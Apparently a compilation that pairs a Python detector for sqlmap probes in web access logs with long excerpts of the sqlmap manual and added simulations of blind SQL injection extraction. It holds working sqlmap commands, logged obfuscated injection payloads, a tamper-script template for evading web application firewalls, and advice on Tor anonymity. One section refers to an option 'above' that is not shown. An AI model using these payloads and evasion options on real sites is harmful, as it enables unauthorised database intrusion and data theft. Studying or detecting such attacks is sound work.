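import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample lines in Combined Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-abcdef0 (http://sqlmap.org)"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /vuln.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6161733a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 221 "-" "Firefox 1.0"
10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [10/Oct/2023:13:55:39 +0000] "GET /search.php?q=floor+plans HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Combined Log Format: ip ident user [time] "method uri proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signal 1: sqlmap's default User-Agent prefix.
UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)

# Signal 2: shape of the error-based probe in the manual's captured request.
# Whitespace-insensitive so padding with %20 (as in that request) does not evade it.
PROBE_RE = re.compile(
    r"SELECT\s+COUNT\(\*\)\s*,\s*CONCAT\(.*FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY",
    re.IGNORECASE | re.DOTALL,
)


def parse_line(line: str) -> Dict[str, str]:
    """Split one Combined Log Format line into its named fields."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    return m.groupdict()


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the list of signals that fired for one parsed log entry."""
    signals = []
    if UA_RE.match(entry["ua"]):
        signals.append("default-sqlmap-user-agent")
    decoded = unquote_plus(entry["uri"])  # inspect the decoded query, not the raw one
    if PROBE_RE.search(decoded):
        signals.append("error-based-probe-in-uri")
    return signals


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that raised at least one signal."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        signals = classify(entry)
        if signals:
            findings.append({"ip": entry["ip"], "uri": entry["uri"], "signals": signals})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The URI is URL-decoded before matching because, as the captured request shows, the payload arrives percent-encoded with %20 padding; matching on the raw line would miss it. The benign "floor plans" query in the sample shows the probe pattern needs the full COUNT/CONCAT/GROUP BY shape, not just the word FLOOR.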

HTTP protocol authentication

Options: --auth-type and --auth-cred

These options can be used to specify which HTTP protocol authentication the back-end web server implements and the valid credentials to be used to perform all HTTP requests to the target application.

The three supported HTTP protocol authentication mechanisms are:

  • Basic
  • Digest
  • NTLM

The credentials’ syntax is username:password.

Example of valid syntax:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id\
=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP protocol private key authentication

Option: --auth-file

This option should be used in cases when the web server requires proper client-side certificate and a private key for authentication. Supplied value should be a PEM formatted key_file that contains your certificate and a private key.

Example of generation of a key_file.txt that is compatible with --auth-file:

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout auth_file.key -out auth_file.pem &&\
cat auth_file.key auth_file.pem > auth_file.txt && cat auth_file.txt
Generating a 2048 bit RSA private key
.........+++
...........+++
writing new private key to 'auth_file.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
-----BEGIN PRIVATE KEY-----
[...]
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDXTCCAkWgAwIBAgIJALTHPlkIs/+KMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV
BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
aWRnaXRzIFB0eSBMdGQwHhcNMTgwODIyMDc0NTQxWhcNMTkwODIyMDc0NTQxWjBF
MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50
ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAljNvCdbmtgyDX1S1NvKHicEInS/b00aBiUeaXwVOjIbt9wr+kblRCQHz
FhCmA0m6m6xMstc1IjU3BphHdNuj3qtEj0b7CrFW+ivhB1Rd6/uhMVxxHLT0W4dh
iM4tpAkDJHRw4Pg4ZonkPfR2sZPSERCWU6NrwtaIbzOTP8rm8OIsIDJQ2lvuLPNj
oDnAi43sGzyxWVOYDFfvFlyylLbVGMFe/Xbj2xLxvUtbKDRR4bvzDnDYiiaR9s0n
oHfQ5OfziURl+cRIr+wMi+LIUC6QKp+ZLmXJtivom/+Mf0cNsk9UpYdrUCIvEXMJ
WMsnDq0qr4Vu773apG5W2JkEMkdgoQIDAQABo1AwTjAdBgNVHQ4EFgQUVvHI/2qF
kmRCEWlWB+ZvJzWTnUkwHwYDVR0jBBgwFoAUVvHI/2qFkmRCEWlWB+ZvJzWTnUkw
DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAg5tmkM75/NEEymu0ublj
c2R1/ZxwbKMjg98KxLqGFJbPVRG0qgIy+uc+Gvh6FEgPF22i4L9DROfuDQW3YSJ6
x3JnJxLsU+jjXxtN7hNwoQziQkicKr0y47TjqOKLlBlKTbdnr74nJXSYQhi4qEFE
qgrUG7ScitgLvcf2sDVf9L2SUsH5iRK+HlgYEtSKhUl5SkLapcUUF+GmectUOkm7
m7Z8gelenVUerLojnQL2avKD07hWTTGkgX2PV8hdun0WIvBLWAcJN+6T9sdakJZZ
qJjFQBXjcxwgVe0vB0vJmqa5lj9OymQnBMjp+3zpUtDJNH2M1qySbU6tGEX1wsW/
VA==
-----END CERTIFICATE-----

Ignore HTTP error 401 (Unauthorized)

Switch --ignore-401

In case that you want to test a site that occasionally returns HTTP error 401 (Unauthorized), while you want to ignore it and continue tests without providing proper credentials, you can use switch --ignore-401.

HTTP(S) proxy

Options and switch: --proxy, --proxy-cred, --proxy-file and --ignore-proxy

It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S) requests to the target URL with option --proxy. The syntax of HTTP(S) proxy value is http://url:port.

If the HTTP(S) proxy requires authentication, you can provide the credentials in the format username:password to the option --proxy-cred.

In case that you want to use (disposable) proxy list, skipping to the next proxy on any sign of a connection problem (e.g. blocking of invasive IP address), option --proxy-file can be used by providing filename of a file containing bulk list of proxies.

Switch --ignore-proxy should be used when you want to run sqlmap against a target that is part of a local area network, ignoring the system-wide HTTP(S) proxy server setting.

Tor anonymity network

Switches and options: --tor, --tor-port, --tor-type and --check-tor

If, for any reason, you need to stay anonymous, instead of passing by a single predefined HTTP(S) proxy server, you can configure a Tor client together with Privoxy (or similar) on your machine as explained in Tor installation guides. Then you can use a switch --tor and sqlmap will try to automatically set Tor proxy connection settings.

In case that you want to manually set the type and port of used Tor proxy, you can do it with options --tor-type and --tor-port (e.g. --tor-type=SOCKS5 --tor-port 9050).

You are strongly advised to use --check-tor occasionally to be sure that everything was set up properly. There are cases when Tor bundles (e.g. Vidalia) come misconfigured (or reset previously set configuration) giving you a false sense of anonymity. Using this switch sqlmap will check that everything works as expected by sending a single request to an official Are you using Tor? page before any target requests. In case that check fails, sqlmap will warn you and abruptly exit.

Delay between each HTTP request

Option: --delay

It is possible to specify a number of seconds to hold between each HTTP(S) request. The valid value is a float, for instance 0.5 means half a second. By default, no delay is set.

Seconds to wait before timeout connection

Option: --timeout

It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out. The valid value is a float, for instance 10.5 means ten seconds and a half. By default 30 seconds are set.

Maximum number of retries when the HTTP connection times out

Option: --retries

It is possible to specify the maximum number of retries when the HTTP(S) connection times out. By default it retries up to three times.

Randomly change value for given parameter(s)

Option: --randomize

It is possible to specify parameter names whose values you want to be randomly changed during each request. Length and type are being kept according to provided original values.

Filtering targets from provided proxy log using regular expression

Option: --scope

Rather than using all hosts parsed from provided logs with option -l, you can specify valid Python regular expression to be used for filtering desired ones.

Example of valid syntax:

$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

Avoid your session to be destroyed after too many unsuccessful requests

Options: --safe-url, --safe-post, --safe-req and --safe-freq

Sometimes web applications or inspection technology in between destroy the session if a certain number of unsuccessful requests is performed. This might occur during the detection phase of sqlmap or when it exploits any of the blind SQL injection types. The reason is that the SQL payload does not necessarily return output and might therefore raise a signal to either the application session management or the inspection technology.

To bypass this limitation set by the target, you can provide any (or combination of) option:

  • --safe-url: URL address to visit frequently during testing.
  • --safe-post: HTTP POST data to send to a given safe URL address.
  • --safe-req: Load and use safe HTTP request from a file.
  • --safe-freq: Test requests between two visits to a given safe location.

This way, sqlmap will visit a given safe URL every predefined number of requests without performing any kind of injection against it.

Turn off URL encoding of parameter values

Switch: --skip-urlencode

Depending on parameter placement (e.g. GET) its value could be URL encoded by default. In some cases, back-end web servers do not follow RFC standards and require values to be sent in their raw non-encoded form. Use --skip-urlencode in those cases.

Bypass anti-CSRF protection

Options: --csrf-token and --csrf-url

Lots of sites incorporate anti-CSRF protection in form of tokens, hidden field values that are randomly set during each page response. sqlmap will automatically try to recognize and bypass that kind of protection, but there are options --csrf-token and --csrf-url that can be used to further fine tune it. Option --csrf-token can be used to set the name of the hidden value that contains the randomized token. This is useful in cases when web sites use non-standard names for such fields. Option --csrf-url can be used for retrieval of the token value from arbitrary URL address. This is useful if the vulnerable target URL doesn’t contain the necessary token value in the first place, but it is required to extract it from some other location.

Force usage of SSL/HTTPS

Switch: --force-ssl

In case that the user wants to force usage of SSL/HTTPS requests toward the target, he can use this switch. This can be useful in cases when URLs are being collected by using option --crawl or when a Burp log is being provided with option -l.

Evaluate custom python code during each request

Option: --eval

In case that user wants to change (or add new) parameter values, most probably because of some known dependency, he can provide to sqlmap a custom python code with option --eval that will be evaluated just before each request.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&amp;hash=c4ca4238a0b9238\
20dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

Each request of such run will re-evaluate value of GET parameter hash to contain a fresh MD5 hash digest for current value of parameter id.

Optimization

These switches can be used to optimize the performance of sqlmap.

Bundle optimization

Switch: -o

This switch is an alias that implicitly sets the following options and switches:

  • --keep-alive
  • --null-connection
  • --threads=3 if not set to a higher value.

Read below for details about each switch.

Output prediction

Switch: --predict-output

This switch is used in inference algorithm for sequential statistical prediction of characters of value being retrieved. Statistical table with the most promising character values is being built based on items given in txt/common-outputs.txt combined with the knowledge of current enumeration used. In case that the value can be found among the common output values, as the process progresses, subsequent character tables are being narrowed more and more. If used in combination with retrieval of common DBMS entities, as with system table names and privileges, speed up is significant. Of course, you can edit the common outputs file according to your needs if, for instance, you notice common patterns in database table names or similar.

Note that this switch is not compatible with --threads switch.

HTTP Keep-Alive

Switch: --keep-alive

This switch instructs sqlmap to use persistent HTTP(s) connections.

Note that this switch is incompatible with --proxy switch.

HTTP NULL connection

Switch: --null-connection

There are special HTTP request types which can be used to retrieve the HTTP response’s size without getting the HTTP body. This knowledge can be used in blind injection technique to distinguish True from False responses. When this switch is provided, sqlmap will try to test and exploit two different NULL connection techniques: Range and HEAD. If any of these is supported by the target web server, the speed-up will come from the obvious saving of used bandwidth.

These techniques are detailed in the white paper Bursting Performances in Blind SQL Injection – Take 2 (Bandwidth).

Note that this switch is incompatible with switch --text-only.

Concurrent HTTP(S) requests

Option: --threads

It is possible to specify the maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do. This feature relies on the multi-threading concept and inherits both its pros and its cons.

This feature applies to the brute-force switches and when the data fetching is done through any of the blind SQL injection techniques. For the latter case, sqlmap first calculates the length of the query output in a single thread, then starts the multi-threading. Each thread is assigned to retrieve one character of the query output. The thread ends when that character is retrieved – it takes up to 7 HTTP(S) requests with the bisection algorithm implemented in sqlmap.

The maximum number of concurrent requests is set to 10 for performance and site reliability reasons.

Note that this option is not compatible with switch --predict-output.
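As an added illustration (not sqlmap code) of the per-character cost stated above: a yes/no oracle stands in for one blind-injection request, and a bisection over the 7-bit ASCII range 0..127 needs exactly 7 oracle calls per character. This is why one extracted character shows up in server logs as a burst of about seven near-identical requests, and why, once the length is known from a single thread, characters can be retrieved independently in parallel. The secret string and the oracle are simulated; no SQL or network traffic is involved.

```python
"""How many requests does blind extraction of one character cost?

Added illustration, not sqlmap code. A boolean oracle simulates one
blind-injection request ("is the character at this position greater than
the threshold?"), and bisection over 0..127 narrows the candidate range by
half on each call, so every character costs exactly 7 calls.
"""
from typing import Callable, Dict, List, Tuple

# (position, threshold) -> True if ord(secret[position]) > threshold
Oracle = Callable[[int, int], bool]


def make_oracle(secret: str) -> Tuple[Oracle, List[Tuple[int, int]]]:
    """Simulated target: answers the comparison and logs every call made."""
    calls: List[Tuple[int, int]] = []

    def oracle(pos: int, threshold: int) -> bool:
        calls.append((pos, threshold))
        return ord(secret[pos]) > threshold

    return oracle, calls


def bisect_char(oracle: Oracle, pos: int, lo: int = 0, hi: int = 127) -> str:
    """Find ord(secret[pos]) within [lo, hi] using at most ceil(log2(hi - lo + 1)) calls."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(pos, mid):   # value > mid: keep the upper half
            lo = mid + 1
        else:                  # value <= mid: keep the lower half
            hi = mid
    return chr(lo)


def extract(oracle: Oracle, length: int) -> str:
    """Retrieve `length` characters; each position's search is independent of the others."""
    return "".join(bisect_char(oracle, i) for i in range(length))


def calls_per_position(secret: str) -> Dict[int, int]:
    """Run a full extraction of `secret` and count oracle calls per character position."""
    oracle, calls = make_oracle(secret)
    extract(oracle, len(secret))
    counts: Dict[int, int] = {}
    for pos, _ in calls:
        counts[pos] = counts.get(pos, 0) + 1
    return counts


if __name__ == "__main__":
    secret = "root@localhost"  # constructed sample value
    print(extract(make_oracle(secret)[0], len(secret)))
    print(calls_per_position(secret))
```

Because 128 is a power of two, the halving always takes exactly seven steps; a narrower candidate range (the --charset option above lets the user restrict it) would lower the count accordingly.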

Injection

These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts.

Testable parameter(s)

Options: -p, --skip and --param-exclude

By default sqlmap tests all GET parameters and POST parameters. When the value of --level is >= 2 it also tests HTTP Cookie header values. When this value is >= 3 it also tests HTTP User-Agent and HTTP Referer header values for SQL injections. It is however possible to manually specify a comma-separated list of parameter(s) that you want sqlmap to test. This will bypass the dependence on the value of --level too.

For instance, to test for GET parameter id and for HTTP User-Agent only, provide -p "id,user-agent".

In case that user wants to exclude certain parameters from testing, he can use option --skip. That is especially useful in cases when you want to use higher value for --level and test all available parameters excluding some of HTTP headers normally being tested.

For instance, to skip testing for HTTP header User-Agent and HTTP header Referer at --level=5, provide --skip="user-agent,referer".

There is also a possibility to exclude certain parameters from testing based on a regular expression run on their names. In such cases the user can use option --param-exclude.

For instance, to skip testing for parameters which contain string token or session in their names, provide --param-exclude="token|session".

URI injection point

There are special cases when injection point is within the URI itself. sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (*) (Note: Havij style %INJECT HERE% is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.

This is particularly useful when, for instance, Apache web server’s mod_rewrite module is in use or other similar technologies.

An example of valid command line would be:

$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

Arbitrary injection point

Similar to URI injection point, asterisk (*) (Note: Havij style %INJECT HERE% is also supported) can also be used to point to the arbitrary injection point inside GET, POST or HTTP headers. Injection point can be specified by marking it inside the GET parameter value(s) provided with option -u, POST parameter value(s) provided with option --data, HTTP header value(s) provided with options -H, --headers, --user-agent, --referer and/or --cookie, or at generic place inside HTTP request loaded from file with option -r.

An example of valid command line would be:

$ python sqlmap.py -u "http://targeturl" --cookie="param1=value1*;param2=value2"

Force the DBMS

Option: --dbms

By default sqlmap automatically detects the web application’s back-end database management system. sqlmap fully supports the following database management systems:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • IBM DB2
  • SQLite
  • Firebird
  • Sybase
  • SAP MaxDB
  • HSQLDB
  • Informix

If for any reason sqlmap fails to detect the back-end DBMS once a SQL injection has been identified, or if you want to avoid an active fingerprint, you can provide the name of the back-end DBMS yourself (e.g. postgresql). For MySQL and Microsoft SQL Server provide them respectively in the form MySQL <version> and Microsoft SQL Server <version>, where <version> is a valid version for the DBMS; for instance 5.0 for MySQL and 2005 for Microsoft SQL Server.

If you provide --fingerprint together with --dbms, sqlmap will perform the extensive fingerprint only for the specified database management system; read below for further details.

Note that this option is not mandatory and it is strongly recommended to use it only if you are absolutely sure about the back-end database management system. If you do not know it, let sqlmap automatically fingerprint it for you.

Force the database management system operating system name

Option: --os

By default sqlmap automatically detects the operating system underlying the web application's back-end database management system, whenever that information is needed by another switch or option you provided. At the moment the fully supported operating systems are:

  • Linux
  • Windows

It is possible to force the operating system name if you already know it, so that sqlmap does not have to detect it itself.

Note that this option is not mandatory and it is strongly recommended to use it only if you are absolutely sure about the back-end database management system underlying operating system. If you do not know it, let sqlmap automatically identify it for you.

Force usage of big numbers for invalidating values

Switch: --invalid-bignum

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of large integer values to fulfill the same goal (e.g. id=99999999).

Force usage of logical operations for invalidating values

Switch: --invalid-logical

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of boolean operations to fulfill the same goal (e.g. id=13 AND 18=19).

Force usage of random strings for invalidating values

Switch: --invalid-string

In cases when sqlmap needs to invalidate original parameter value (e.g. id=13) it uses classical negation (e.g. id=-13). With this switch it is possible to force the usage of random strings to fulfill the same goal (e.g. id=akewmc).

Turn off payload casting mechanism

Switch: --no-cast

When retrieving results, sqlmap casts every entry to the string type and replaces NULL values with a whitespace character. This prevents erroneous states (e.g. concatenation of NULL values with string values) and eases the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL) where this mechanism has to be turned off with this switch because it breaks data retrieval (e.g. None values are returned).

Turn off string escaping mechanism

Switch: --no-escape

In cases when sqlmap needs to use (single-quote delimited) string values inside payloads (e.g. SELECT 'foobar'), those values are automatically escaped (e.g. SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)). This is done for two reasons: obfuscation of the payload content, and avoiding problems with query escaping mechanisms (e.g. magic_quotes and/or mysql_real_escape_string) at the back-end server. Use this switch to turn it off (e.g. to reduce payload size).

Custom injection payload

Options: --prefix and --suffix

In some circumstances the vulnerable parameter is exploitable only if the user provides a specific suffix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and suffix.

Example of vulnerable source code:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and exploit this SQL injection, you can either let sqlmap detect the boundaries (as in combination of SQL payload prefix and suffix) for you during the detection phase, or provide them on your own.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php\
?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This will result in all sqlmap requests to end up in a query as follows:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

Which makes the query syntactically correct.

In this simple example sqlmap could detect the SQL injection and exploit it without the need to provide custom boundaries, but in real-world applications it is sometimes necessary to provide them, for instance when the injection point is within nested JOIN queries.

Tamper injection data

Option: --tamper

sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their CHAR()-alike representation.

This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism is usually a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF): all buzzwords for the same concept, implemented in different ways and usually costing lots of money.

To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts; each will process the payload and return it transformed. You can write your own tamper scripts, use the ones shipped in sqlmap's tamper/ folder, or edit them, as long as you pass them comma-separated as the value of option --tamper (e.g. --tamper="between,randomcase").

The format of a valid tamper script is as follows:

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

You can check valid and usable tamper scripts in the tamper/ directory.

Example against a MySQL target assuming that > character, spaces and capital SELECT string are banned:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONC
AT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/
**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/info
rmation_schema.tables/**/group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[...]

Detection

These options can be used to customize the detection phase.

Level

Option: --level

This option requires an argument which specifies the level of tests to perform. There are five levels. The default value is 1, where a limited number of tests (requests) are performed. Conversely, level 5 tests verbosely for a much larger number of payloads and boundaries (as in pairs of SQL payload prefix and suffix). The payloads used by sqlmap are specified in the textual file xml/payloads.xml. Following the instructions at the top of that file, if sqlmap misses an injection you should be able to add your own payload(s) to test for too!

This option affects not only which payloads sqlmap tries, but also which injection points are examined: GET and POST parameters are always tested, HTTP Cookie header values are tested from level 2, and HTTP User-Agent/Referer header values are tested from level 3.

All in all, the harder it is to detect a SQL injection, the higher the --level must be set.

It is strongly recommended to raise this value before reporting to the mailing list that sqlmap is not able to detect a certain injection point.

Risk

Option: --risk

This option requires an argument which specifies the risk of tests to perform. There are three risk values. The default value is 1 which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also OR-based SQL injection tests.

In some instances, like a SQL injection in an UPDATE statement, injecting an OR-based payload can lead to an update of all the entries of the table, which is certainly not what the attacker wants. For this reason and others this option has been introduced: the user has control over which payloads get tested and can deliberately choose to use potentially dangerous ones too. As for the previous option, the payloads used by sqlmap are specified in the textual file xml/payloads.xml and you are free to edit it and add your own.

Page comparison

Options: --string, --not-string, --regexp and --code

By default, a True query is distinguished from a False one (the rough concept behind boolean-based blind SQL injection) by comparing the page content of the injected request with the original, not injected, page content. This does not always work, because sometimes the page content changes at each refresh even without injecting anything, for instance when the page has a counter, a dynamic advertisement banner or any other part of the HTML that is rendered dynamically and may change over time, not only as a consequence of the user's input. To work around this, sqlmap tries hard to identify these snippets of the response bodies and deal with them accordingly. Sometimes it may fail; that is why the user can provide a string (option --string) which should be present on the original page (though that is not a requirement) and on all True injected query pages, but not on the False ones. Instead of a static string, the user can provide a regular expression (option --regexp). Alternatively, the user can provide a string (option --not-string) which is present neither on the original page nor on any True injected query page, but always appears on False ones.

Such data is easy for a user to retrieve: simply try to inject an invalid value into the affected parameter and compare manually the original (not injected) page content with the injected (wrong) page content. This way the distinction will be based upon string presence or regular expression match.

In cases when user knows that the distinction of a True query from a False one can be done using HTTP code (e.g. 200 for True and 401 for False), he can provide that information to sqlmap (e.g. --code=200).

Switches: --text-only and --titles

In cases when the user knows that the distinction of a True query from a False one can be done using the HTML title (e.g. Welcome for True and Forbidden for False), title-based comparison can be turned on with switch --titles.

In cases with lot of active content (e.g. scripts, embeds, etc.) in the HTTP responses’ body, you can filter pages (switch --text-only) just for their textual content. This way, in a good number of cases, you can automatically tune the detection engine.
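
As an added example (not part of the sqlmap manual or its code base), the following Python simulates the situation just described: a page whose body changes on every request because of a hit counter, so that comparing whole bodies never yields True, while a --string, --not-string or --regexp style marker, or the title as with --titles, gives a stable oracle. The last function uses that oracle to extract a constructed secret character by character with a binary search, the way a boolean-based blind technique does. The page markup, the secret value and all function names are invented for the demonstration; nothing is sent over the network.

```python
# Added example: page comparison oracles for boolean-based blind injection
import itertools
import re

_counter = itertools.count(1)

# Constructed secret standing in for e.g. the DBMS user the page would leak
SECRET = "postgres"


def vulnerable_page(condition_true):
    """Simulated response of a page whose SQL WHERE clause evaluated to
    condition_true. The hit counter changes on every request, like the
    dynamic content described above, so two identical requests never yield
    byte-identical bodies."""
    hits = next(_counter)
    title = "Welcome" if condition_true else "Forbidden"
    body = "<html><title>%s</title><body>" % title
    body += "<p>Hits today: %d</p>" % hits
    body += "<p>Welcome back, luther</p>" if condition_true else "<p>No such user</p>"
    return body + "</body></html>"


def naive_is_true(original, injected):
    """What comparing whole response bodies amounts to: useless here,
    because the counter differs in every response."""
    return original == injected


def is_true(body, string=None, not_string=None, regexp=None):
    """Decide True/False the way --string / --not-string / --regexp do."""
    if string is not None:
        return string in body
    if not_string is not None:
        return not_string not in body
    if regexp is not None:
        return re.search(regexp, body) is not None
    raise ValueError("need one of string, not_string, regexp")


def title_of(body):
    """The --titles comparison: only the <title> element is looked at."""
    m = re.search(r"<title>(.*?)</title>", body, re.S)
    return m.group(1) if m else ""


def oracle(cond):
    """Stand-in for sending id=1 AND <cond>: the page renders the True or
    the False branch depending on the condition evaluated on the secret."""
    return vulnerable_page(cond(SECRET))


def extract(string="Welcome back"):
    """Recover the secret one character at a time, binary-searching the
    printable ASCII range with the string-based oracle (7 requests per
    character plus one per position to test for the end of the value)."""
    result = ""
    pos = 0
    while is_true(oracle(lambda s: len(s) > pos), string=string):
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if is_true(oracle(lambda s: ord(s[pos]) > mid), string=string):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
        pos += 1
    return result


if __name__ == "__main__":
    a, b = vulnerable_page(True), vulnerable_page(True)
    print("naive comparison of two True pages:", naive_is_true(a, b))
    print("--string oracle on a True page:", is_true(a, string="Welcome back"))
    print("extracted:", extract())
```

Picking the marker is the practitioner's job: it must flip with the injected condition and with nothing else, which is why a string from the content branch ("Welcome back") works and the counter line would not.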

Techniques

These options can be used to tweak testing of specific SQL injection techniques.

SQL injection techniques to test for

Option: --technique

This option can be used to specify which SQL injection type to test for. By default sqlmap tests for all types/techniques it supports.

In certain situations you may want to test only for one or a few specific types of SQL injection, though, and this is where this option comes into play.

This option requires an argument. Such argument is a string composed by any combination of B, E, U, S, T and Q characters where each letter stands for a different technique:

  • B: Boolean-based blind
  • E: Error-based
  • U: Union query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

For instance, you can provide ES if you want to test for and exploit error-based and stacked queries SQL injection types only. The default value is BEUSTQ.

Note that the string must include stacked queries technique letter, S, when you want to access the file system, takeover the operating system or access Windows registry hives.

Seconds to delay the DBMS response for time-based blind SQL injection

Option: --time-sec

It is possible to set the number of seconds to delay the response when testing for time-based blind SQL injection, by providing the --time-sec option followed by an integer. By default its value is set to 5 seconds.

Number of columns in UNION query SQL injection

Option: --union-cols

By default sqlmap tests for the UNION query SQL injection technique using 1 to 10 columns. However, this range can be increased up to 50 columns by providing a higher --level value. See the relevant paragraph for more details.

You can manually tell sqlmap to test for this type of SQL injection with a specific range of columns by providing the tool with the option --union-cols followed by a range of integers. For instance, 12-16 means tests for UNION query SQL injection by using 12 up to 16 columns.

Character to use to test for UNION query SQL injection

Option: --union-char

By default sqlmap tests for the UNION query SQL injection technique using the NULL character. However, by providing a higher --level value sqlmap will also perform tests with a random number, because there are some corner cases where UNION query tests with NULL fail whereas with a random integer they succeed.

You can manually tell sqlmap to test for this type of SQL injection with a specific character by using option --union-char with desired character value (e.g. --union-char 123).

Table to use in FROM part of UNION query SQL injection

Option: --union-from

In some UNION query SQL injection cases there is a need to enforce the usage of a valid and accessible table name in the FROM clause; Microsoft Access, for example, requires one. Without it, the UNION query SQL injection won't work correctly. Provide the table with this option (e.g. --union-from=users).

DNS exfiltration attack

